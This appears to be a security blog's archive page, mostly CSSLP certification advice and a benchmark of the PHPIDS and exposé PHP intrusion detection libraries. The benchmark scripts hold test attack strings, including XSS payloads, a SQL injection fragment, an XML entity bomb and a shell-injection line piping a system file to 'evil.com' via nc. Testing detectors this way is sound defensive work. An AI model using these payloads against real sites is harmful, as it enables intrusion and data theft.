Yes, I know. It has not been weekly. Since I last posted a lot of script kiddies populated my logs but not with anything all that interesting. Until today.
Category: security
In a rare occurrence for me, I am continuing my series of watching hack logs. You can check out all the episodes here: HOTW
For this episode I am pulling out an older record because I think it was rather clever.
Reviewing your logs is an important part of maintaining good system security. One log I watch on a constant basis is my IDS report (mainly because it constantly emails me). This is part one in (hopefully) an ongoing series of looking into what the script kiddies are up to, and how your server might be vulnerable.
On last official day with Redport Information Assurance, I received confirmation of my Certified Secure Software Lifecycle Professional acceptance by (ISC)2. I am very grateful that Redport repeatedly covered my training and certification process. Alas, the story of our mutual separation will be a separate blog post.
Last week I passed the (ISC)2 Certified Secure Software Lifecycle Professional (CSSLP) exam. Here are some thoughts (not bound by the (ISC)2 NDA):
Cert Types
There are two classes of certification within the (ISC)2 family: member and associate. The only difference between the two is how many years of experience you have in the subject area. For full membership, you need to have 4 years experience in at least 1 of 8 domains. If you have been doing devops for at least 4 years you will most likely be fine. If not, then you can go for the “associate” cert with the understanding that you have 5 years to gain that experience.
Summary: If the reason you are getting this cert is to have some letters on your resume, you might want to just go for the associate level. Who knows where you will be in 5 years.
Preparation
Option 1: Experience
This cert focuses on security aspects in the full lifecycle of “enterprise” application development (read: .Net/Java). Honestly, I do not believe that my 18+ years of PHP development would have prepared me to pass this test, even though I had several years of Java dev in the midst. There were too many questions on processes, Microsoft, Java, and acronyms. My three years in the infosec arena certainly helped, but did not cover all the bases.
Option 2: Official Training = High cost / Low risk
If you prefer live training, want to make dead sure you pass the test, and you have $2695 laying around, you can take (ISC)2’s official week-long trainings. The also have self-study classes from $99 up to $695. If your company wants to pay for this, awesome! Good luck with that. (ISC)2 also has CSSLP Flash Cards on their website, but in my case they only represented about 60% of the concepts on the exam I took.
Option 2: Job training portals = Low cost / Medium risk
Through my office, I was able to take the free FedVTE online CSSLP training. The 20-hour series of videos from CMU were great as an overarching review of security practices (when they say 20 hours they really mean 30+ hours). I feel that these trainings only provide a 60% solution. The information is great and highly recommended, but if your goal is passing, it won’t be enough by itself.
Looking back I also had access to the CSSLP resources on Skillport/Skillsoft. Make sure to check your company offerings.
Option 3: Read the book
There are several books out there purporting 90% passing rates. Looking at the comments on the latest official (ISC)2 offering will not give you much hope of passing. Not being too confident in scope of the FedVTE Computer Based Test (CBT) class, I purchased Conklin’s CSSLP Certification All-in-One Exam Guide. Similar to the CBT, the material covered was broad but still did not cover all the areas of the test. The Microsoft specific areas of the book were definitely helpful, coming from a Linux world.
Summary: GetConklin’s book. If you are on a budget, use the official (ISC)2 training and books as a last resort.
Exam
Time: You have 4 hours to complete 175 multiple choice questions at a Pearson Vue center. I managed to finish in under 90 minutes. ie. You have plenty of time to read each question carefully.
Content: As a CBT, each persons’ exam should be different, so YYMV. Although the practice exams got me a bit scared, I did not encounter any “Which of these 4 ISO standards is the right one?” A fair number could be solved just by process of elimination. Having the years of experience certainly helped with a number of questions that the CBT and books overlooked.
Passing: I was surprised when I first looked at this test, as you only need a 70% to pass. Part of that may be the fact that the test is “a mile wide and an inch deep“.
Completion
Unlike certifications you might be used to, (ISC)2 and some others require you to be endorsed by someone who is an active (ISC)2 member in good standing. Hopefully you already know someone who is a member and can vouch that you have the required professional experience. In a couple weeks that should be me as well.
Prospects & Alternatives
A search today on some of the more popular boards reveals job postings for CSSLP professionals.
These numbers are not all that great, especially since I did not place a geographical restriction on the search.
There are many other security related certificates out there. CASP, CISSP, GWEB, and CEH are some of the more well known.Though some colleagues believe the value has been watered down in recent years, there are over 10x more jobs requiring a CISSP certificate. In many postings where CSSLP shows up, it is paired with one of these other more well known options.
Summary: If you are getting this to find a new job, other certs have more flexibility.
Value
Cost: Certs are not cheap. The CSSLP exam costs $595, plus, to keep your cert active, you must pay $100 and receive 30 Continuing Professional Education (CPE) credits per year. Training can be expensive as well. If your company is willing to pay for it, great! Out of pocket, ouch.
Visibility: This is not a well known cert. Despite the (ISC)2 website saying “CSSLP Named #1 Tech Cert that is Paying Off by Foote Partners” (for the first half of 2014), the job market says otherwise. Granted, it is no longer 2014 so perhaps it did pay off for 6 months.
Credits: Many certs these days require you to receive CPE credits to stay “active”. I plan on using the CSSLP as 50 CPE credits to renew my Security+ cert.
Usefulness: This cert material is useful, especially if you do not have a formal CS degree, or you are moving more toward leading teams or project management. It is a SDLC focused cert after all. There was a broad mix of useful security practices, “enterprise” situations, and supply chain considerations. At the very least, government recruiters like to see tons of certs on resumes.
Conclusion
It seems that certain people (especially government related entities) think the only way a person can know material is if they have paper proof. If you are looking to switch toward the security industry but lack the experience, I would check out the Security+ exam first. Several government agencies will accept that as proof that you know enough security to get in the door. If you already have 5+ years in infosec, go for the CASP or CISSP instead. They both have broader visibility. However, if you are a PHP developer and plan on working just for PHP companies, the ZCE is a much better place to start, with its lower upfront cost and no yearly maintenance fee.
I totally forgot to mention that I was published in the September edition of phpArchitect. Not only that, you can download my article for free. Head on over to https://www.phparch.com/magazine/2015-2/september/ to grab your copy. If you missed my php[world]15 talk, this will get you up to speed.
I had the privilege to present two talks at php[world]15 this week.
Inheriting a legacy app can be an adventure. Sometimes it can be much more than that. Trying to securely lock down a legacy app can be a much larger prospect. Here is a “quick” first pass recommendation.
Here is the slide deck for my talk on Basic Intrusion Detection With PHPIDS. If you attended, please provide feedback at Joind.in
Many years ago I stumbled upon PHPIDS and began incorporating it into all the systems that I built. I wanted to have an extra layer of intel into who was accessing my systems. Last year, at php[tek]13, @enygma started building Exposé, an alternate IDS, based upon the same rulesets as PHPIDS (perhaps motivated by my uncon talk). After making a few meager contributions myself, I decided to see how the two stacked up.
Setup
First, lets get two clean copies of each library from github using composer.
mkdir exposetest cat > exposetest/composer.json <<COMPOSER { "require":{ "enygma/expose":"dev-master" }, "minimum-stability" : "dev" } COMPOSER mkdir phpidstest cat > phpidstest/composer.json <<COMPOSER { "require":{ "PHPIDS/PHPIDS":"dev-master" }, "minimum-stability" : "dev" } COMPOSER cd exposetest && composer install cd ../phpidstest && composer install #get the default config and filters to where PHPIDS can read them cp vendor/phpids/phpids/lib/IDS/Config/Config.ini.php vendor/phpids/phpids/lib/IDS/default_filter.xml . #give PHPIDS somewhere to write its cache mkdir tmp cd ..
Once that is done, you will notice that exposé has three dependencies, whereas PHPIDS only has one. Currently, exposé follows the PSR-2 and PSR-3 standards, whereas PHPIDS does not. PSR-3 support makes a difference if you want to simply drop in your own logger instead of the default.
Test Scripts
Ok, back to testing. Lets set up a basic set of possibly malicious code for each library to parse, and use the recommended default install for each. A couple of the chosen test elements reference back to the default filter sets provided by PHPIDS, so we know something will trigger. Starting with the venerable PHPIDS, make an index.php in phpidstest:
//PHPIDS TEST RIG require 'vendor/autoload.php'; /* testing set */ $data = array( '1' => 'bah"></a>', //rule 1: html escape '21' => '%22+onMouseOver%3D%22alert%28', //rule 21: basic XSS probings '3' => '>aabbcc</abc>', //rule 3: finds unquoted attribute breaking injections '4' => '<IMG SRC=javascript:alert('XSS')>', '5' => '<IMG SCR=javascript:alert('XSS')>', '6' => '<iframe src=http://ha.ckers.org/scriptlet.html <', '7' => '<<SCRIPT>alert("XSS");//<</SCRIPT>', '8' => '<<SCRIPT>prompt("XSS");//<</SCRIPT>', '9'=>'<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>', '10'=>"';alert(String.fromCharCode(88,83,83))", '11'=>'<IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;>', '76'=>'union select from', 'xmlexp'=>'<!DOCTYPE root [<!ENTITY a "Ha !">]><root>&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;</root>', 'shell'=>'foo || cat /etc/password | nc evil.com', ); $loops = 1; //for later $start = time(); for ($i=0;$i<$loops;$i++){ foreach($data as $key=>$datum){ $s = time(); $init = \IDS\Init::init('./Config.ini.php'); $ids = new \IDS\Monitor($init); $result = $ids->run(array('POST'=>array($key=>$datum))); echo $key.":\t".$result->getImpact()."\t".(time()-$s)."\n"; clearstatcache(); } } $end = time(); echo "Elapsed: ".($end-$start)."\n";
And now exposé. By default exposé wants to use a Mongo logger, but we can toss in the MockLogger instead. Once again make an index.php in exposetest:
require 'vendor/autoload.php'; require 'vendor/enygma/expose/tests/MockLogger.php'; //use a mock so we don't have to worry about Mongo /* testing set */ $data = array( '1' => 'bah"></a>', //rule 1: html escape '21' => '%22+onMouseOver%3D%22alert%28', //rule 21: basic XSS probings '3' => '>aabbcc</abc>', //rule 3: finds unquoted attribute breaking injections '4' => '<IMG SRC=javascript:alert('XSS')>', '5' => '<IMG SCR=javascript:alert('XSS')>', '6' => '<iframe src=http://ha.ckers.org/scriptlet.html <', '7' => '<<SCRIPT>alert("XSS");//<</SCRIPT>', '8' => '<<SCRIPT>prompt("XSS");//<</SCRIPT>', '9'=>'<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>', '10'=>"';alert(String.fromCharCode(88,83,83))", '11'=>'<IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;>', '76'=>'union select from', 'xmlexp'=>'<!DOCTYPE root [<!ENTITY a "Ha !">]><root>&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;</root>', 'shell'=>'foo || cat /etc/password | nc evil.com', ); $loops = 1; //for later $start = time(); for ($i=0;$i<$loops;$i++){ foreach($data as $key=>$datum){ $s=time(); $filters = new \Expose\FilterCollection(); $filters->load(); $logger = new \Expose\MockLogger(); $manager = new \Expose\Manager($filters, $logger); $manager->run(array('POST'=>array($key=>$datum))); echo $key.":\t".$manager->getImpact()."\t".(time()-$s)."\n"; clearstatcache(); } } $end = time(); echo "Elapsed: ".($end-$start)."\n";
Comparing Threat Levels
Our first test run is to check to see how exposé and PHPIDs rate each threat. We just run “php index.php” in each folder and compare. Simple.
Impact Results:
Test PHPIDS exposé 1: 11 4 21: 3 3 3: 2 2 4: 51 5 * 5: 9 5 6: 13 13 7: 29 18 8: 29 18 9: 24 0 * 10: 32 13 * 11: 11 0 * 76: 20 20 xmlexp: 16 11 * shell: 10 10
As a rule of thumb, I have set my impact threshold around 12. You would need to tune the value to your specific environment and requirements. As you can see here, there are 5 specific tests that differ significantly (within my threshold):
- 4 & 11: Obfuscation of an image source path
- 9 & 10: fromCharCode js obfuscation
- xml entity expansion
Resource Test
Both of these basic tests run in a blink of the eye. Altering the $loop parameter to 1000, we start to see a bit of a speed difference between the two engines.
PHPIDS: 28s exposé: 32s
In both cases, the script pegged one CPU. Memory usage did not vary significantly.
Both libraries churn through these simple example tests. How about a real world example?
Maliciousness
I have collected a few particularly nasty exploits recently. Some drop a shell code browser on your box. Others are more full featured with included SQL browsers. So, I decided to put PHPIDS and exposé to a more rigorous test. In this example I tested a 27k long mystery string which would normally be converted with eval(gzinflate(base64_decode(EVILNESS))) into “lulz u r p0wnd” nastiness. Here are the results (using only 10 loops instead of 1000):
Library Impact Speed PHPIDS 47 141s exposé 18 26s
PHPIDS winds up being a lot slower on this known bad vector, yet it gives us a much higher impact level. This is primarily due to the PHPIDS “Centrifuge” which does additional black magic behind the scenes.
Conclusion
In the realm of an inline PHP IDS, we are left with the triad of: sensitivity, selectivity, and performance. High sensitivity allows for better detection of threats. Higher selectivity (or spread in the impact levels) allows for better separation of threat risk. These two directly effect the performance/thoughput. PHPIDS and exposé have differing sensitivity levels, meaning you may have to lower your threshold for the same amount of detection. The lower your impact threshold, the more noise (and email alerts) you will encounter. And finally, both will have a performance hit, but PHPIDS more so due to the higher sensitivity.
exposé is a great new entry to the very small world of PHP based intrusion detection. It is up to the latest PHP coding standards, will easily integrate with existing systems, and shows excellent promise. It has several other features of note, like an offline processing queue, that you should check out. If you tune your impact thresholds a bit lower, you can get roughly the same detection with some performance gain, however it did miss the mark on a couple specific threats. When it comes to larger and more complicated nastiness, PHPIDS’s Centrifuge provides a more thorough breakdown of the intrusion attempt.
If you are not already monitoring your logs, you need to start. Perhaps PHPIDS or exposé can move you in that direction. Happy coding, and keep your websites safe!